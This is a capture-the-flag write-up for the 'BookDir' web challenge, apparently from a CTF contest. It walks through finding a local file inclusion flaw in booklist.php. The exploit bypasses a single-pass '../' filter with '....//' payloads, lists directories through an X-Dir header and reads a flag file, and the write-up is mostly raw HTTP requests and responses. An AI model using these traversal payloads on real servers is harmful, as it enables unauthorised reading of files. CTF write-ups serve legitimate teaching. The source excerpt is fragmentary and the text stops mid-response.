# ▼▼▼BookDir (Web:125pts)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
89.38.210.129:8012
```
---
**【Identify the vulnerability and filter】**
**(1)Normal response**
```
GET /books/booklist.php?f=Beloved HTTP/1.1
GET /books/booklist.php?f=./Beloved HTTP/1.1
GET /books/booklist.php?f=./../Beloved HTTP/1.1
GET /books/booklist.php?f=././Be../loved HTTP/1.1
GET /books/booklist.php?f=./../Beloved../ HTTP/1.1
GET /books/booklist.php?f=/////////Beloved HTTP/1.1
GET /books/booklist.php?f=..//Beloved HTTP/1.1
```
↓
```
"\"124 was spiteful. Full of baby's venom. The women in the house knew it and so did the children.\"\n"
```
---
**(2)Different from normal response**
```
GET /books/booklist.php?f=..././Beloved HTTP/1.1
GET /books/booklist.php?f=..Beloved HTTP/1.1
GET /books/booklist.php?f=B/eloved HTTP/1.1
GET /books/booklist.php?f=B./eloved HTTP/1.1
```
↓
```
false
```
---
Conclusion
↓
・LFI vulnerability exists!!
・Behavior of filter
`../` will be deleted (in a single pass, so the characters left around a deleted `../` can re-form `../`, which is why `....//` works below)
`..` will not be deleted
`./` will not be deleted
`/` will not be deleted
---
**【Get source code】**
```
GET /books/booklist.php?f=....//booklist.php
```
↓
```
" $file];
}
echo json_encode($files);
}
"
```
↓
From the source: the `X-Dir` request header selects a directory, and the response is the file list of that directory
---
**【Get file list】**
**(1)Get the file list of `./`**
↓
```
GET /books/booklist.php HTTP/1.1
Host: 89.38.210.129:8012
X-Dir: ./
```
↓
```
[{"name":"Beloved"},{"name":"Catch-22"},{"name":"Lolita"},{"name":"Nineteen Eighty-Four"},{"name":"The Catcher in the Rye"},{"name":"The Grapes of Wrath"},{"name":"The Great Gatsby"},{"name":"The Sound and the Fury"},{"name":"Ulysses"}]
```
---
**(2)Get the file list of `../`**
```
GET /books/booklist.php HTTP/1.1
Host: 89.38.210.129:8012
X-Dir: ../
```
↓
```
[{"name":"4o4_fl4g_n0t_f0und.php"},{"name":"booklist.php"},{"name":"books.js"},{"name":"css"},{"name":"index.html"},{"name":"list"},{"name":"vendor"}]
```
---
**【Get a flag file】**
```
GET /books/booklist.php?f=....//4o4_fl4g_n0t_f0und.php HTTP/1.1
```
↓
```
"
Legend